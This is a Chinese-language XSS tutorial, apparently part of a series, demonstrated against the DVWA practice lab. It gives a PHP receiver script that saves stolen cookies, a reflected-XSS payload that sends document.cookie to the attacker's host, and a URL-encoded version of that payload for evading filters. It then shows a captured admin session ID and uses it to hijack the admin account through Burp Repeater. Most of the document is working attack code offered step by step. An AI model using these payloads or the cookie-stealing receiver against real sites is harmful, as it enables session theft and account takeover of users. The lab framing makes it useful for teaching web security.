XSS漏洞-XSS攻击实例（七）

1.1 窃取用户cookie信息保存到远程服务器

1.1.1 构建钓鱼网站接收cookie

页面中创建cookie变量，然后将cookie变量写入cookie.txt

# vim /var/www/html/diaoyu.php
<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>
# touch cookie.txt
# chown www-data.www-data cookie.txt
# systemctl start apache2.service

1.1.2 构建URL

1.1.2.1  构建payload

<script>document.location='http://192.168.10.180/diaoyu.php?cookie='+document.cookie</script>

payload说明：

• location：用于跳转页面
• http://192.168.10.180/diaoyu.php’?cookie=’+document.cookie：传递cookie参数到php

1.1.2.2  完整URL

http://192.168.10.159/DVWA/vulnerabilities/xss_r/?name=<script>document.location='http://192.168.10.180/diaoyu.php?cookie='+document.cookie</script>

但是因为url中直接有”js脚本”，有时服务器会拒绝，导致访问不成功，所以我们使用burpsuite对payload进行URL加密：

替换后的URL是：

http://192.168.10.159/DVWA/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%30%2e%31%38%30%2f%64%69%61%6f%79%75%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

注意：这个加密链接想直接访问必须提前登录DVWA，否则浏览器没有cookie信息会无法获取cookie。

1.1.3 在物理机上执行攻击

1.1.3.1  登录admin用户并修改安全级别

1.1.3.2  直接使用URL访问

访问后会自动跳转到钓鱼网站

1.1.4 查看获取到的cookie信息

┌──(root?kali)-[/var/www/html]
└─# cat cookie.txt
PHPSESSID=re1bikctb5qftocp0fqus1qos0; security=low

1.1.5 使用获取到的cookie提权

1.1.5.1  开启burpsuite拦截

1.1.5.2  使用普通用户登录DVWA

DVWA中内置了一些其他用户，这里我们使用用户名：smithy密码：password登录DVWA。

放行第一个请求，因为该请求携带用户名和密码：

1.1.5.3  进行cookie替换并提权

将存在Cookie信息的请求发送到Repeater进行重放攻击，将现在的普通用户的cookie信息替换成前期抓到的admin cookie信息：PHPSESSID= re1bikctb5qftocp0fqus1qos0; security=low

点击Send返回状态码200表示成功。

1.1.5.4  浏览器查看提权成功

浏览器中访问：

成功切换为admin用户。